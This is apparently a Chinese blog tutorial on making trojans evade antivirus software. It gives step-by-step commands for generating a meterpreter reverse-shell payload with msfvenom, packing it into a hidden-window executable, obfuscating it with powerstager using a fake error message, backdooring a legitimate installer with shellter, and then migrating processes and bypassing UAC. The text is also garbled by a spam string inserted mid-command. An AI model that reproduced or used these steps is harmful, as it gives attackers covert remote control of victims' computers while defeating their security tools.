由于现在版本的木马查杀工具更新之快,木马在计算机上基本是裸奔的,再好的免杀技术也逃不过工具的查杀,下面是我研究很久的本地木马免杀,基本都是网上的百度总结,把可以是实现免杀的木马生成进行了总结。
使用pyinstall,先生成py再转换成exe文件
1.生成py文件
msfvenom -p python/meterpreter/revSEO靠我erse_tcp lhost=192.168.137.44 lport=4444 -f raw -o shell.py把py文件导入到windows机器,此处略去了环境的配置,百度pyinstalleSEO靠我r的安装和使用后看第二步。
2.使用pypinsatller(使用pip安装)转换成exe文件,使用时需进入到Script目录下
Script目录下命令
生成exe文件时建议使用以下命令(参数解释:-F为打SEO靠我包一个py文件,-w为执行时隐藏窗口)
./pyinstaller.exe -F -w ./shell.py显示successfully就表示转换成exe文件成功
利用powerstager制作SEO靠我免杀木马
(1)python 工具
apt-get install python3 apt-get install mingw-w64因缺少names包,需安装pip再安装names包
apSEO靠我t-get install python3-pip pip3 install names(2)先克隆再安装
git clone https://github.com/z0noxz/powSEO靠我erstager cd powerstager sudo ./setup.py installwin32:命令一样,下面的win64改成win32就可
win64:
pytSEO靠我hon3 powerstager.py -m -t win64 --lhost=192.168.0.104 --lport=4444 -o /root/桌面/test.exe –obfuscationSEO靠我 –fake-error=”error:The program terminated due to an error”(我感觉上面的几个属性标签没啥卵用啊)
免杀效果:
ps:(若无法运行powerstager则需要安装wine64,可以运行此步骤可直接省略)
安装wine 64:
sudoSEO靠我 dpkg --add-architecture i386 sudo apt-get update sudo apt-get install wine:i386 SEO靠我 sudo apt-get install wine-bin:i386免杀成功3
shelter免杀(只能过火绒和腾讯电脑管家,360动态查杀掉)
shelter仅支持绑定32位的程序,使用npSEO靠我pinstaller.exe作为木马程序
安装shellter apt-get update apt-get install shellter插件安装:
dpkg --add-architecture iSEO靠我386 && apt-get update && apt-get install wine32 启动并使用启动:进入安装目录,窗口输入shellter即可启动
使用:
(选择模式 A 自动模式自动注入后门SEO靠我,M高级模式,H帮助)
输入A
PE Target:程序路径
是否启动隐身模式:Y
、
设置payload,先输入L选择payload,然后再输入攻击机ip和端口
使用进程迁移来解决点击错误信息后断连情况(可自行SEO靠我百度msf进程迁移)
以下两种进程迁移选择其一即可,上为指定进程迁移,下为自动的进程迁移,默认迁移到notepad.exe。
set autorunscript migrate -n explorer.eSEO靠我xe set autorunscript -fMsf绕过uac提升权限
更换渗透模块 use exploit/windows/local/bypassuac 设置session2.提SEO靠我高权限
网站备案号:浙ICP备17034767号-2